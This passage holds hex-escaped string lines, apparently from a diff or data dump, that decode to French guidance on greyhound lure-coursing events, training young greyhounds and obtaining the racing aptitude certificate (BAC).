-"\x2c\x20\x6d\x61\x69\x73\x20\x72\xe9\x75\x6e\x69\x73\x73\x65\x6e"
-"\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x65\x73\x20\x63\x6f"
-"\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x67\x72\x61"
-"\x6e\x64\x65\x20\x76\x61\x6c\x65\x75\x72\x2e\x0d\x0d\x33\x29\x20"
-"\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76\x65\x73\x20\x64\x65\x20"
-"\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x56\x75\x65\x20"
-"\x73\x75\x72\x20\x4c\x65\x75\x72\x72\x65\x20\x28\x45\x2e\x50\x2e"
-"\x56\x2e\x4c\x2e\x29\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x64\x65"
-"\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x64\x65\x75\x78"
-"\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2c\x20\x72\x61"
-"\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c\x27\x61\x70\x74\x69\x74\x75"
-"\x64\x65\x20\xe0\x20\x6c\x61\x20\x63\x68\x61\x73\x73\x65\x2e\x20"
-"\x4c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x6f\x75"
-"\x72\x73\x75\x69\x76\x65\x6e\x74\x20\x75\x6e\x20\x6c\x65\x75\x72"
-"\x72\x65\x20\x73\x75\x72\x20\x75\x6e\x20\x6c\x6f\x6e\x67\x20\x70"
-"\x61\x72\x63\x6f\x75\x72\x73\x20\x65\x6e\x20\x73\x6c\x61\x6c\x6f"
-"\x6d\x20\x63\x6f\x6d\x70\x72\x65\x6e\x61\x6e\x74\x20\x64\x65\x73"
-"\x20\x6f\x62\x73\x74\x61\x63\x6c\x65\x73\x20\x65\x74\x20\x70\x6c"
-"\x61\x63\xe9\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x6e\x61\x74\x75"
-"\x72\x65\x2e\x20\x43\x68\x61\x63\x75\x6e\x20\x65\x73\x74\x20\x6a"
-"\x75\x67\xe9\x20\x73\x75\x72\x20\x73\x6f\x6e\x20\x63\x6f\x6d\x70"
-"\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\xe0\x20\x70\x61\x72\x74\x69"
-"\x72\x20\x64\x65\x20\x73\x61\x20\x76\x69\x74\x65\x73\x73\x65\x2c"
-"\x20\x73\x61\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x63\x65\x2c\x20"
-"\x73\x6f\x6e\x20\x61\x72\x64\x65\x75\x72\x2c\x20\x73\x6f\x6e\x20"
-"\x61\x73\x74\x75\x63\x65\x2c\x20\x73\x6f\x6e\x20\x63\x6f\x75\x72"
-"\x61\x67\x65\x2c\x20\x65\x74\x20\x73\x6f\x6e\x20\x61\x72\x74\x20"
-"\x64\x65\x20\x63\x61\x70\x74\x75\x72\x65\x20\xe0\x20\x6c\x27\x61"
-"\x72\x72\x69\x76\x35\x65\x2e\x20\x41\x20\x6c\x27\xe9\x74\x72\x61"
-"\x6e\x67\x65\x72\x20\x6c\x65\x73\x20\x45\x2e\x50\x2e\x56\x2e\x4c"
-"\x2e\x20\x73\x6f\x6e\x74\x20\x61\x70\x70\x65\x6c\xe9\x65\x73\x20"
-"\x43\x6f\x75\x72\x73\x69\x6e\x67\x20\x65\x74\x20\x6c\x65\x20\x6a"
-"\x75\x67\x65\x6d\x65\x6e\x74\x20\x65\x73\x74\x20\x64\x69\x66\x66"
-"\xe9\x72\x65\x6e\x74\x2e\x0d\x0d\x51\x75\x61\x6e\x64\x20\x65\x74"
-"\x20\x63\x6f\x6d\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x6d\x65\x6e\x63"
-"\x65\x72\x20\x3f\x0d\x4c\x65\x20\x6a\x65\x75\x6e\x65\x20\x4c\xe9"
-"\x76\x72\x69\x65\x72\x20\x65\x73\x74\x20\x61\x6d\x65\x6e\xe9\x20"
-"\x61\x75\x20\x74\x65\x72\x72\x61\x69\x6e\x20\xe0\x20\x75\x6e\x20"
-"\xe2\x67\x65\x20\x63\x6f\x6d\x70\x72\x69\x73\x20\x67\xe9\x6e\xe9"
-"\x72\x61\x6c\x65\x6d\x65\x6e\x74\x20\x65\x6e\x74\x72\x65\x20\x36"
-"\x20\x6d\x6f\x69\x73\x20\x65\x74\x20\x31\x20\x61\x6e\x20\x73\x65"
-"\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x2e\x20\x49\x6c\x20"
-"\x64\x6f\x69\x74\x20\xea\x74\x72\x65\x20\x61\x73\x73\x65\x7a\x20"
-"\x6a\x65\x75\x6e\x65\x20\x70\x6f\x75\x72\x20\x71\x75\x65\x20\x6c"
-"\x27\x6f\x6e\x20\x70\x72\x6f\x66\x69\x74\x65\x20\x64\x65\x20\x73"
-"\x61\x20\x74\x65\x6e\x64\x61\x6e\x63\x65\x20\x6e\x61\x74\x75\x72"
-"\x65\x6c\x6c\x65\x20\xe0\x20\x6a\x6f\x75\x65\x72\x20\x65\x74\x20"
-"\x63\x6f\x75\x72\x69\x72\x20\x61\x70\x72\xe8\x73\x20\x75\x6e\x20"
-"\x6c\x65\x75\x72\x72\x65\x2c\x20\x6d\x61\x69\x73\x20\x61\x73\x73"
-"\x65\x7a\x20\x66\x6f\x72\x6d\xe9\x20\x70\x6f\x75\x72\x20\x6e\x65"
-"\x20\x70\x61\x73\x20\x72\x69\x73\x71\x75\x65\x72\x20\x64\x65\x20"
-"\x6c\x75\x69\x20\x61\x62\xee\x6d\x65\x72\x20\x6c\x65\x20\x73\x71"
-"\x75\x65\x6c\x65\x74\x74\x65\x20\x70\x61\x72\x20\x64\x65\x73\x20"
-"\x65\x72\x72\x65\x75\x72\x73\x20\x20\x64\x27\x65\x6e\x74\x72\x61"
-"\xee\x6e\x65\x6d\x65\x6e\x74\x2e\x20\x49\x6c\x20\x70\x6f\x75\x72"
-"\x72\x61\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20\xe0\x20\x63"
-"\x6f\x75\x72\x69\x72\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65"
-"\x6d\x65\x6e\x74\x20\x61\x70\x72\xe8\x73\x20\x31\x32\x20\x6f\x75"
-"\x20\x31\x35\x20\x6d\x6f\x69\x73\x20\x73\x65\x6c\x6f\x6e\x20\x6c"
-"\x61\x20\x72\x61\x63\x65\x2e\x20\x0d\x0d\x4c\x65\x20\x64\x72\x65"
-"\x73\x73\x61\x67\x65\x0d\x4f\x6e\x20\x63\x6f\x6d\x6d\x65\x6e\x63"
-"\x65\x20\x70\x61\x72\x20\x6c\x27\x68\x61\x62\x69\x74\x75\x65\x72"
-"\x20\x61\x75\x78\x20\x62\x72\x75\x69\x74\x73\x2c\x20\x61\x75\x78"
-"\x20\x61\x62\x6f\x69\x65\x6d\x65\x6e\x74\x73\x2c\x20\xe0\x20\x6c"
-"\x61\x20\x70\x72\xe9\x73\x65\x6e\x63\x65\x20\x64\x27\x61\x75\x74"
-"\x72\x65\x73\x20\x63\x68\x69\x65\x6e\x73\x2c\x20\x65\x74\x20\x63"
-"\x65\x6c\x61\x20\x70\x65\x75\x74\x20\x73\x65\x6e\x66\x61\x69\x72"
-"\x65\x20\x74\x72\xe8\x73\x20\x74\xf4\x74\x2e\x20\x0d\x50\x75\x69"
-"\x73\x20\x6f\x6e\x20\x6c\x75\x69\x20\x6d\x6f\x6e\x74\x72\x65\x20"
-"\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x6f\x6e\x20"
-"\x6c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x20\xe0\x20\x63\x6f"
-"\x75\x72\x69\x72\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x2e\x0d\x44"
-"\x27\x61\x75\x74\x72\x65\x73\x20\x70\x72\xe9\x66\xe8\x72\x65\x6e"
-"\x74\x20\x70\x6c\x61\x63\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72"
-"\x72\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x70\x6f\x75\x72"
-"\x20\x71\x75\x27\x69\x6c\x20\x70\x61\x73\x73\x65\x20\xe0\x20\x67"
-"\x72\x61\x6e\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65\x20\x64\x65"
-"\x76\x61\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20"
-"\x71\x75\x69\x20\x61\x20\x61\x6c\x6f\x72\x73\x20\x6c\x65\x20\x72"
-"\xe9\x66\x6c\x65\x78\x65\x20\x64\x65\x20\x70\x61\x72\x74\x69\x72"
-"\x20\xe0\x20\x73\x61\x20\x70\x6f\x75\x72\x73\x75\x69\x74\x65\x2e"
-"\x20\x49\x6c\x20\x65\x73\x74\x20\x70\x72\xe9\x66\xe9\x72\x61\x62"
-"\x6c\x65\x20\x64\x65\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20"
-"\x76\x65\x72\x73\x20\x6c\x61\x20\x66\x69\x6e\x20\x64\x75\x20\x70"
-"\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x6c\x65\x20\x70\x72\x6f\x70"
-"\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x73\x65\x20\x74\x65\x6e\x61"
-"\x6e\x74\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x65"
-"\x74\x20\x75\x6e\x20\x74\x69\x65\x72\x73\x20\x61\x6d\x65\x6e\x61"
-"\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x75"
-"\x20\x64\xe9\x70\x61\x72\x74\x2e\x20\x43\x6f\x6d\x6d\x65\x20\x63"
-"\x65\x6c\x61\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6d\x6f\x74"
-"\x69\x76\xe9\x20\xe0\x20\x6c\x61\x20\x66\x6f\x69\x73\x20\x70\x61"
-"\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x72"
-"\x65\x76\x65\x6e\x69\x72\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x75"
-"\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x71\x75"
-"\x69\x20\x64\x6f\x69\x74\x20\x6c\x65\x20\x66\xe9\x6c\x69\x63\x69"
-"\x74\x65\x72\x20\x62\x72\x75\x79\x61\x6d\x6d\x65\x6e\x74\x2e\x20"
-"\x50\x65\x75\x20\xe0\x20\x70\x65\x75\x2c\x20\x6f\x6e\x20\x61\x6c"
-"\x6c\x6f\x6e\x67\x65\x20\x6c\x61\x20\x64\x69\x73\x74\x61\x6e\x63"
-"\x65\x20\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x70\x61\x72\x63\x6f"
-"\x75\x72\x73\x20\x63\x6f\x6d\x70\x6c\x65\x74\x2e\x0d\x4d\x61\x69"
-"\x73\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69"
-"\x72\x20\x64\x65\x73\x20\x76\x61\x72\x69\x61\x6e\x74\x65\x73\x20"
-"\x6d\x75\x6c\x74\x69\x70\x6c\x65\x73\x20\x73\x65\x6c\x6f\x6e\x20"
-"\x6c\x65\x73\x20\x63\x6c\x75\x62\x73\x2e\x20\x43\x65\x72\x74\x61"
-"\x69\x6e\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x66\x6f\x6e"
-"\x74\x20\x6c\x65\x20\x74\x6f\x75\x72\x20\x63\x6f\x6d\x70\x6c\x65"
-"\x74\x20\x64\x27\x65\x6d\x62\x6c\xe9\x65\x2c\x20\x64\x27\x61\x75"
-"\x74\x72\x65\x73\x20\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20"
-"\x64\x27\x75\x6e\x20\x67\x72\x61\x6e\x64\x20\x61\x70\x70\x72\x65"
-"\x6e\x74\x69\x73\x73\x61\x67\x65\x2e\x20\x51\x75\x61\x6e\x64\x20"
-"\x69\x6c\x20\x63\x6f\x75\x72\x74\x20\x62\x69\x65\x6e\x20\x61\x75"
-"\x20\x6c\x65\x75\x72\x72\xbf\x2c\x20\x69\x6c\x20\x65\x73\x74\x20"
-"\x70\x72\xea\x74\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x2e\x56"
-"\x2e\x4c\x2e\x2e\x20\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x45\x2e"
-"\x4e\x2e\x43\x2e\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x61\x70"
-"\x70\x65\x6c\xe9\x65\x73\x20\x72\x61\x63\x69\x6e\x67\x2c\x20\x69"
-"\x6c\x20\x64\x6f\x69\x74\x20\x61\x66\x66\x72\x6f\x6e\x74\x65\x72"
-"\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20\x74\xe2\x63\x68\x65\x73"
-"\x20\x3a\x20\x4c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65"
-"\x20\xe0\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x72\x20\x6c\x61\x20"
-"\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x2c\x20\x6f\x62\x6c\x69\x67"
-"\x61\x74\x6f\x69\x72\x65\x20\x70\x6f\x75\x72\x20\xe9\x76\x69\x74"
-"\x65\x72\x20\x6c\x65\x73\x20\x62\x61\x74\x61\x69\x6c\x6c\x65\x73"
-"\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x70\x6f\x75"
-"\x72\x20\x6c\x61\x20\x63\x61\x70\x74\x75\x72\x65\x20\x64\x75\x20"
-"\x6c\x65\x75\x72\x72\x65\x2e\x20\x49\x6c\x20\x73\x75\x66\x66\x69"
-"\x74\x20\x64\x65\x20\x6c\x75\x69\x20\x6d\x65\x74\x74\x72\x65\x20"
-"\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x20\x61\x76\x61"
-"\x6e\x74\x20\x75\x6e\x20\x64\xe9\x70\x61\x72\x74\x20\x6f\x75\x20"
-"\x75\x6e\x65\x20\x70\x72\x6f\x6d\x65\x6e\x61\x64\x65\x2c\x20\x70"
-"\x6f\x75\x72\x20\x71\x75\x27\x69\x6c\x20\x61\x73\x73\x6f\x63\x69"
-"\x65\x20\x6a\x6f\x69\x65\x20\x65\x74\x20\x6d\x75\x73\x65\x6c\x69"
-"\xe8\x72\x65\x2e\x20\x43\x27\x65\x73\x74\x20\x61\x73\x73\x65\x7a"
-"\x20\x66\x61\x63\x69\x6c\x65\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70"
-"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72\x74\x69\x72\x20"
-"\x65\x6e\x20\x62\x6f\x69\x74\x65\x20\x3a\x20\x65\x6e\x74\x72\x65"
-"\x72\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x63\x61\x73\x65\x2c\x20"
-"\x61\x74\x74\x65\x6e\x64\x72\x65\x20\x6c\x27\x6f\x75\x76\x65\x72"
-"\x74\x75\x72\x65\x2c\x20\x62\x6f\x6e\x64\x69\x72\x2e\x20\x43\x27"
-"\x65\x73\x74\x20\x65\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x74"
-"\x72\xe8\x73\x20\x20\x66\x61\x63\x69\x6c\x65\x3b\x20\x70\x61\x72"
-"\x66\x6f\x69\x73\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x6c\x75\x69"
-"\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72"
-"\x74\x69\x72\x20\x64\x65\x73\x20\x62\x6f\x69\x74\x65\x73\x20\x6f"
-"\x75\x76\x65\x72\x74\x65\x73\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70"
-"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72"
-"\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x20\x63\x6f\x6e\x63"
-"\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x43\x27\x65\x73\x74\x20\x75"
-"\x6e\x20\x70\x6f\x69\x6e\x74\x20\x71\x75\x69\x20\x70\x65\x75\x74"
-"\x20\xea\x74\x72\x65\x20\x64\xe9\x6c\x69\x63\x61\x74\x2e\x20\x53"
-"\x69\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e\x27\x65"
-"\x73\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x6d\x6f\x74"
-"\x69\x76\xe9\x20\x61\x75\x20\x6c\x65\x75\x72\x72\x65\x2c\x20\x73"
-"\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\xe9\x74\xe9\x20"
-"\x74\x72\x6f\x70\x20\x70\x72\x65\x73\x73\xe9\x20\x64\x65\x20\x6c"
-"\x65\x20\x6d\x65\x74\x74\x72\x65\x20\x65\x6e\x20\x67\x72\x6f\x75"
-"\x70\x65\x20\x73\x61\x6e\x73\x20\x61\x74\x74\x65\x6e\x64\x72\x65"
-"\x20\x75\x6e\x20\x62\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65"
-"\x20\x65\x6e\x20\x73\x6f\x6c\x6f\x2c\x20\x76\x6f\x75\x73\x20\x61"
-"\x6c\x6c\xce\x7a\x20\x61\x75\x20\x64\x65\x76\x61\x6e\x74\x20\x64"
-"\x65\x20\x64\xe9\x73\x61\x67\x72\xe9\x6d\x65\x6e\x74\x73\x2e\x20"
-"\x49\x6c\x20\x76\x61\x20\x6a\x6f\x75\x65\x72\x20\xe0\x20\x62\x6f"
-"\x75\x73\x63\x75\x6c\x65\x72\x20\x6c\x65\x73\x20\x61\x75\x74\x72"
-"\x65\x73\x20\x28\x6f\x6e\x20\x64\x69\x74\x20\x71\x75\x27\x69\x6c"
-"\x20\x62\x6f\x75\x67\x65\x2c\x20\x71\x75\x27\x69\x6c\x20\x61\x74"
-"\x74\x61\x71\x75\x65\x29\x20\x63\x6f\x6d\x6d\x65\x20\x64\x65\x73"
-"\x20\x63\x68\x69\x6f\x74\x73\x20\x71\x75\x69\x20\x6a\x6f\x75\x65"
-"\x6e\x74\x20\x65\x6e\x73\x65\x6d\x62\x6c\x65\x2e\x20\x4f\x75\x20"
-"\x62\x69\x65\x6e\x20\x73\x69\x20\x6c\x65\x20\x6c\x65\x75\x72\x72"
-"\x65\x20\x6e\x27\x61\x20\x70\x61\x73\x20\xe9\x74\xe9\x20\x70\x6c"
-"\x61\x63\xe9\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20"
-"\x62\x6f\x69\x74\x65\x20\x63\x6f\x6d\x6d\x65\x20\x6c\x65\x20\x76"
-"\x65\x75\x74\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74"
-"\x2c\x20\x6c\x65\x73\x20\x36\x20\x20\x4c\xe9\x76\x72\x69\x65\x72"
-"\x73\x20\x76\x6f\x6e\x74\x20\x73\x65\x20\x70\x72\xe9\x63\x69\x70"
-"\x69\x74\x65\x72\x20\x76\x65\x72\x73\x20\x6c\x65\x20\x70\x6f\x69"
-"\x6e\x74\x20\x6f\xf9\x20\xe9\x74\x61\x69\x74\x20\x6c\x65\x20\x6c"
-"\x65\x75\x72\x72\x65\x2c\x20\x64\x27\x6f\xf9\x20\x62\x6f\x75\x73"
-"\x63\x75\x6c\x61\x64\x65\x2e\x0d\x44\x27\x61\x75\x74\x72\x65\x73"
-"\x20\x6e\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x6e\x74\x20\x70"
-"\x61\x73\x20\x64\x27\xea\x74\x72\x65\x20\x72\x61\x74\x74\x72\x61"
-"\x70\xe9\x73\x2c\x20\x6f\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9"
-"\x73\x20\x61\x75\x20\x74\x6f\x75\x72\x6e\x61\x6e\x74\x20\x3a\x20"
-"\x69\x6c\x73\x20\x73\x65\x20\x72\x65\x62\x69\x66\x66\x65\x6e\x74"
-"\x2e\x0d\x44\x61\x6e\x73\x20\x74\x6f\x75\x73\x20\x63\x65\x73\x20"
-"\x63\x61\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e"
-"\x65\x20\x70\x65\x75\x74\x20\xea\x74\x72\x65\x20\x61\x63\x63\x65"
-"\x70\x74\xe9\x20\x65\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4c"
-"\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x76\x61\x20\x64\xe9"
-"\x70\x65\x6e\x64\x72\x65\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20"
-"\x61\x73\x73\x69\x64\x75\x69\x74\xe9\x20\xe0\x20\x6c\x27\x65\x6e"
-"\x74\x72\x61\xee\x6e\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x64\x65"
-"\x20\x6c\x61\x20\x76\x61\x6c\x65\x75\x72\x20\x64\x65\x73\x20\x6d"
-"\x6f\x6e\x69\x74\x65\x75\x72\x73\x20\x64\x75\x20\x63\x6c\x75\x62"
-"\x2e\x20\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x69\x76\x65"
-"\x72\x73\x65\x73\x20\x6d\xe9\x74\x68\x6f\x64\x65\x73\x20\x70\x6f"
-"\x75\x72\x20\x72\x65\x64\x72\x65\x73\x73\x65\x72\x20\x75\x6e\x20"
-"\x61\x74\x74\x61\x71\x75\x61\x6e\x74\x20\x28\x71\x75\x69\x20\x65"
-"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x65\x73\x74\x20\x75\x6e"
-"\x20\x6a\x6f\x75\x65\x75\x72\x20\x6f\x75\x20\x75\x6e\x20\x63\x72"
-"\x61\x69\x6e\x74\x69\x66\x2c\x20\x72\x61\x72\x65\x6d\x65\x6e\x74"
-"\x20\x75\x6e\x20\x61\x67\x72\x65\x73\x73\x69\x66\x29\x2e\x0d\x56"
-"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x61\x69"
-"\x74\x20\x63\x6f\x75\x72\x69\x72\x20\x65\x6e\x20\x67\x72\x6f\x75"
-"\x70\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\xea\x74\x20"
-"\xe0\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x6c\x65\x20\x64\x72\x6f"
-"\x69\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x2e\x0d\x0d\x4c"
-"\x65\x20\x70\x61\x73\x73\x61\x67\x65\x20\x64\x75\x20\x42\x41\x43"
-"\x0d\x50\x6f\x75\x72\x20\x63\x65\x6c\x61\x20\x69\x6c\x20\x64\x6f"
-"\x69\x74\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x42\x72"
-"\x65\x76\x65\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20"
-"\x61\x75\x78\x20\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28\x42\x2e"
-"\x41\x2e\x43\x2e\x29\x20\x20\x65\x74\x20\x75\x6e\x65\x20\x61\x74"
-"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x76\x61\x6c"
-"\x69\x64\x69\x74\xe9\x20\x28\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f"
-"\x6c\x6f\x72\xe9\x2c\x20\x6c\x69\x63\x65\x6e\x63\x65\x29\x2e\x0d"
-"\x0d\x4f\xf9\x3a\x0d\x4f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65"
-"\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x20\x63\x6c\x75"
-"\x62\x20\x61\x67\x72\xe9\xe9\x20\x64\x6f\x6e\x74\x20\x64\xe9\x70"
-"\x65\x6e\x64\x20\x76\x6f\x74\x72\x65\x20\x6c\x69\x65\x75\x20\x64"
-"\x65\x20\x72\xe9\x73\x69\x64\x65\x6e\x63\x65\x20\x28\x73\x61\x75"
-"\x66\x20\x50\x61\x72\x69\x73\x20\x6f\xf9\x20\x63\x68\x61\x71\x75"
-"\x65\x20\x63\x6c\x75\x62\x20\x63\x6f\x75\x76\x72\x65\x20\x6c\x27"
-"\x49\x6c\x65\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x29\x2e\x20"
-"\x4d\x61\x69\x73\x20\x73\x75\x72\x20\x64\x65\x6d\x61\x6e\x64\x65"
-"\x20\x6d\x6f\x74\x69\x76\xe9\x65\x20\x76\x6f\x75\x73\x20\x70\x6f"
-"\x75\x76\x65\x7a\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x65"
-"\x20\x64\xe9\x72\x6f\x67\x61\x74\x69\x6f\x6e\x20\x70\x6f\x75\x72"
-"\x20\x61\x6c\x6c\x65\x72\x20\x61\x69\x6c\x6c\x65\x75\x72\x73\x2c"
-"\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x50\x72\xe9"
-"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x63\x6c\x75\x62\x20\x61"
-"\x74\x74\x72\x69\x62\x75\x74\x61\x69\x72\x65\x2c\x20\x73\x6f\x69"
-"\x74\x20\x65\x6e\x20\x63\x61\x73\x20\x72\x65\x66\x75\x73\x2c\x20"
-"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f"
-"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x2e\x20\x49\x6c\x20\x66"
-"\x61\x75\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x75\x6e\x20"
-"\x6d\x6f\x74\x69\x66\x20\xe9\x63\x72\x69\x74\x2e\x0d\x0d\x43\x6f"
-"\x6d\x6d\x65\x6e\x74\x20\x3a\x0d\x31\x29\x20\x56\x6f\x75\x73\x20"
-"\xe9\x63\x72\x69\x76\x65\x7a\x20\xe0\x20\x6c\x61\x20\x53\x6f\x63"
-"\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61\x6c\x65\x20\x43\x61"
-"\x6e\x69\x6e\x65\x20\x71\x75\x69\x20\x76\x6f\x75\x73\x20\x76\x65"
-"\x6e\x64\x20\x75\x6e\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20"
-"\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x64\x6f\x6e\x74\x20\x6c\x65"
-"\x20\x6d\x6f\x64\xe8\x6c\x65\x20\x65\x73\x74\x20\x64\xe9\x73\x6f"
-"\x72\x6d\x61\x69\x73\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x6f\x75"
-"\x72\x20\x6c\x61\x20\x46\x72\x61\x6e\x63\x65\x20\x65\x74\x20\x6c"
-"\x27\xe9\x74\x72\x61\x6e\x67\x65\x72\x2c\x20\x6d\x61\x69\x73\x20"
-"\x71\x75\x69\x20\x6e\x65\x20\x73\x75\x66\x66\x69\x74\x20\x70\x61"
-"\x73\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x69\x72\x2e\x20\x0d"
-"\x50\x75\x69\x73\x20\x76\x6f\x75\x73\x20\xe9\x63\x72\x69\x76\x65"
-"\x7a\x20\x61\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x64"
-"\x65\x20\x43\x6c\x75\x62\x20\x70\x6f\x75\x72\x20\x6c\x75\x69\x20"
-"\x64\x65\x6d\x61\x6e\x64\x65\x72\x20\x75\x6e\x20\x70\x61\x73\x73"
-"\x61\x67\x65\x20\x64\x65\x20\x42\x41\x43\x2c\x20\x61\x75\x20\x6d"
-"\x6f\x69\x6e\x73\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20"
-"\x6c\x27\x61\x76\x61\x6e\x63\x65\x2e\x20\x44\xe8\x73\x20\x71\x75"
-"\x65\x20\x6c\x61\x20\x64\x61\x74\x65\x20\x65\x73\x74\x20\x66\x69"
-"\x78\xe9\x65\x2c\x20\x76\x6f\x75\x73\x20\x76\x65\x6e\x65\x7a\x20"
-"\x61\x76\x65\x63\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x72\x6e\x65"
-"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x6c\x61"
-"\x20\x70\x68\x6f\x74\x6f\x63\x6f\x70\x69\x65\x20\x64\x75\x20\x70"
-"\x65\x64\x69\x67\x72\x65\x65\x20\x65\x74\x20\x6c\x61\x20\x63\x61"
-"\x72\x74\x65\x20\x64\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e"
-"\x0d\x53\x65\x75\x6c\x20\x6c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65"
-"\x72\x73\x20\x63\x6f\x6e\x66\x69\x72\x6d\xe9\x73\x2c\x20\x64\x6f"
-"\x6e\x63\x20\x64\x6f\x74\xe9\x73\x20\x64\x27\x75\x6e\x20\x70\x65"
-"\x64\x69\x67\x72\x65\x65\x20\x64\xe9\x66\x69\x6e\x69\x74\x69\x66"
-"\x2c\x20\x73\x6f\x6e\x74\x20\x61\x75\x74\x6f\x72\x69\x73\xe9\x73"
-"\x20\xe0\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x42\x41\x43"
